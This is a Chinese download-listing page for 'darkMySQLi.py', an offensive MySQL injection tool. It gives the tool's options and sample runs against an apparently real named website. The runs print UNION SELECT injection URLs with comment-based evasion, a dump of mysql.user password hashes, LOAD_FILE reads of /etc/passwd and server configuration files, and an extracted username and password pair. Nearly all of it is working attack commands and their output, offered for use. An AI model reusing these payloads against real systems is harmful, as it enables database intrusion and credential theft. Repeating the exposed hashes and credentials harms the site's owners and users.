强大的国外注入工具-darkMySQLi.py darkMySQLi v.1.0 rsauron@g

文件名称: 强大的国外注入工具-darkMySQLi.py

所属分类: 其它

开发工具:

文件大小: 16kb

下载次数: 0

上传时间: 2009-09-22

提供者: lizhe*****

下载 (16kb)

不能下载？报告错误

详细说明： darkMySQLi v.1.0 rsauron@gmail.com Usage: ./darkMySQLi.py [options] Options: -h, --help shows this help message and exits -d, --debug display URL debug information Target: -u URL, --url=URL Target url Methodology: -b, --blind Use blind methodology (req: --string) -s, --string String to match in page when the query is valid Method: --method=PUT Select to use PUT method Modes: --dbs Enumerate databases MySQL v5+ --schema Enumerate Information_schema (req: -D, opt: -T) MySQL v5+ --full Enumerate all we can MySQL v5+ --info MySQL Server configuration MySQL v4+ --fuzz Fuzz Tables & Columns Names MySQL v4+ --findcol Find Column length MySQL v4+ --dump Dump database table entries (req: -T, opt: -D, -C, --start, --stop) MySQL v4+ Define: -D DB database to enumerate -T TBL database table to enumerate -C COL database table column to enumerate Optional: --where=COL,VALUE Use a where clause in your dump --orderby=COL Use a orderby clause in your dump --proxy=PROXY Use a HTTP proxy to connect to the target url --output=FILE.TXT Output results of tool to this file 实例: darkc0de:darkMySQLi rsauron$ ./darkMySQLi.py -u "http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4, 5,6,7,8,9,10" --info |--------------------------------------------------| | rsauron@gmail.com v1.0 | | 1/2009 darkMySQLi.py | | -- Multi Purpose MySQL Injection Tool -- | | Usage: darkMySQLi.py [options] | | -h help darkc0de.com | |--------------------------------------------------| [+] URL: http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4,5,6,7,8,9,10 [+] 14:06:17 [+] Evasion: /**/ -- [+] Cookie: None [-] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: db2889_rayner_en User: mysql2889@localhost Version: 5.0.32-Debian_7etch1-log [+] Do we have Access to MySQL Database: YES <-- w00t w00t [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a,password),3,4,5,6,7,8,9,10+FROM+mysql .user-- [+] Dumping MySQL user info. host:user:password [+] Number of users in the mysql.user table: 6 [0] localhost:root:N [1] dlx35341:root:N [2] localhost:debian-sys-maint:*0EF29B1AED94CC60062FED7F4DF2224A0C880A10 [3] localhost:mysql2908:*6F0D804E0EB35256C22367F95D8D1E31A4E5BAAD [4] localhost:mysql2970:*7351A8BF4BD4C9E8FD20109F24916B9C93ADBF83 [5] localhost:mysql2889:*8050739003BBDB60551FA99B5FFF34957C4F5F49 [+] Do we have Access to Load_File: YES <-- w00t w00t [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9,10-- [+] Magic quotes are: OFF [+] Starting Load_File Fuzzer... [+] Number of system files to be fuzzed: 37 [!] Found /et@c/pa@sswd [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7,8,9,10-- [!] Found /et@c/hos@ts [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f686f737473),3,4,5,6,7,8,9,10-- [!] Found /et@c/m@otd [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f6d6f7464),3,4,5,6,7,8,9,10-- [!] Found /et@c/apach@e2/apache2.conf [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f617061636865322f617061636865322e 636f6e66),3,4,5,6,7,8,9,10-- [!] Found /et@c/apa@che2/httpd.conf [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f617061636865322f68747470642e636f 6e66),3,4,5,6,7,8,9,10-- [!] Found /et@c/ap@ache2/sites-available/default [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f617061636865322f73697465732d6176 61696c61626c652f64656661756c74),3,4,5,6,7,8,9,10-- [!] Found /et@c/m@ysql/my.cnf [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f6d7973716c2f6d792e636e66),3,4,5, 6,7,8,9,10-- [-] 14:06:43 [-] Total URL Requests: 48 [-] Done info dump with where clause option and debug turned on darkc0de:darkMySQLi rsauron$ ./darkMySQLi.py -u "http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4, 5,6,7,8,9,10" --dump -D db2889_rayner_en -T auth -C name,pass --where pass,ridley --debug |--------------------------------------------------| | rsauron@gmail.com v1.0 | | 1/2009 darkMySQLi.py | | -- Multi Purpose MySQL Injection Tool -- | | Usage: darkMySQLi.py [options] | | -h help darkc0de.com | |--------------------------------------------------| [+] URL: http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4,5,6,7,8,9,10 [+] 14:17:43 [+] Evasion: /**/ -- [+] Cookie: None [-] Proxy Not Given [+] Gathering MySQL Server Configuration... [debug] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(0x6461726b63306465,0x1e,version(),0x1e,user (),0x1e,database(),0x1e,0x6461726b63306465),3,4,5,6,7,8,9,10-- Database: db2889_rayner_en User: mysql2889@localhost Version: 5.0.32-Debian_7etch1-log [+] Dumping data from database "db2889_rayner_en" Table "auth" [+] and Column(s) ['name', 'pass'] [+] WHERE clause: WHERE+pass=0x7269646c6579 [+] ORDERBY clause: [debug] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(0x1e,0x1e,COUNT(*),0x1e,0x20),3,4,5,6,7,8,9 ,10/**/FROM/**/db2889_rayner_en.auth/**/WHERE/**/pass=0x7269646c6579-- [+] Number of Rows: 1 [debug] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(0x1e,0x1e,name,0x1e,pass,0x1e,0x1e,0x20),3, 4,5,6,7,8,9,10/**/FROM/**/db2889_rayner_en.auth/**/WHERE/**/pass=0x7269646c6579/**//**/LIMIT/**/0,1-- [1] rayneriol:ridley: [-] 14:17:45 [-] Total URL Requests: 3 [-] Done 具体用户请看提示帮助 ...展开收缩

(系统自动生成,下载前可以参看下载内容)